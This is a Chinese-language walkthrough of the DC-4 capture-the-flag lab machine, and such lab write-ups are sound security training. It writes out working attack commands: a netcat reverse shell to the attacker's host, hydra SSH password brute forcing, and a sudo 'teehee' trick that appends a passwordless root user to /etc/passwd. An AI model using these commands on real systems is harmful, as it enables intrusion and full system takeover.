该靶机提权思路有点意思,采用修改passwd文件进行root 操作
靶机IP:192.168.8.160
nmap全扫
nmap -sS -Pn -A -p- -n 192.168.8.160
image.png
就基本的常规渗透思路吧
web渗透
image.png上来就是登录界面
http://192.168.8.160/images/ ,也没什么重要的线索
后台爆破
无奈只能用大字典跑一遍看看
image.png
发现了一个 登录口令
admin happy
登录后台
登录可以发现command命令执行
image.png
抓个包试试,执行些命令
果然可以执行任意命令
image.png
命令执行-nc反弹getshell
尝试nc反弹
nc 192.168.8.253 4444 -e /bin/bash
kali中先开启监听
image.png
成功反弹
提权(修改passwd)
进入home目录下,发现了三个用户
image.png
发现只有jim用户下有线索,在backups目录下有个密码备份 old-password.bak
image.png
想必就是jim用户的密码吧
拿来ssh登录爆破下
hydra直接爆
hydra -l jim -P jim ssh://192.168.8.160
image.png
爆破成功,登录口令为
jim jibril04
jim用户ssh登录
登录后,打开查看mbox,是root用户发来的,
image.png
登录不久后,发现提示了一封新邮件
image.png进入 该路径下看看
image.png
想必这就是 Charles 的密码
charles ^xHhA&hvim0y
切换用户charles
image.pngsudo -l
查看用户权限发现,该用户可以以root权限免密码执行 /usr/bin/teehee
get root
之前做过一些渗透是用定时器提权,或者是篡改 passwd 写入一个具有root权限的伪用户进行get root
添加一个 hack用户,并使用teehee执行写入 passwd中
echo "hack::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
参数解释
#如:admin:x:0:0::/home/admin:/bin/bash
#[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
修改完passwd文件,重启一下靶机,直接可以无密码切换hack用户
直接
su hack
image.png
直接无密码进入,是root权限
get flag
image.png总结
1、该靶机渗透在web信息收集阶段并没有什么有用的线索,就直接想到后台爆破即可
2、在反弹getshell后发现一封邮件,拿到新用户的登录口令
3、进入新用户的目录中,发现其具有超级用户的权限执行,采用修改passwd文件,添加一个免密码的超级用户,进行提权
DC-4靶机百度云下载
链接:https://pan.baidu.com/s/1ftpEws_F4_v2OYpruVxkYw
提取码:bj2t
网友评论